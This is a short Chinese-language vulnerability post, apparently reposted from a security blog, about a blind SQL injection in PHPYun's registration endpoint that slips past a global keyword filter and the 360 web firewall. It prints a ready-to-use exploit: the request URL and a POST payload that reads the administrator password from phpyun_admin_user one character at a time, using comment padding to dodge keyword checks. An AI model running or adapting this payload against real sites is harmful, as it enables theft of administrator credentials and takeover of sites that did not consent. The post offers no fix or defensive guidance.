phpyun注射绕过360防护

文章目录

漏洞作者: Noxxx

注册时检测会员是否使用问题

model\register.class.php

23 行

 

没有回显只能盲注了.

里面有个全局过滤和360的 360的白名单就行了 全局过滤还是比较坑的

db.safety.php

只要检测文本不连续出现关键词就通过了

底下还有一个过滤值的,不过也没关键词.

exp:

http://0day5.com/phpyun/?m=register&c=ajax_reg&admin_dir=admin

(POST)

uid`%26%26(SELECT(MID(password,1,1)%3D’1′)FROM/**=**/phpyun_admin_user)%23 (会员表里有数据就行 )

 

成功返回1

失败返回0

13174855a0b0a0c3e9c75b8cdb644949d8c36331

 

漏洞证明:

13172155408b323450c1cb3aa1908c891242bd5d

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录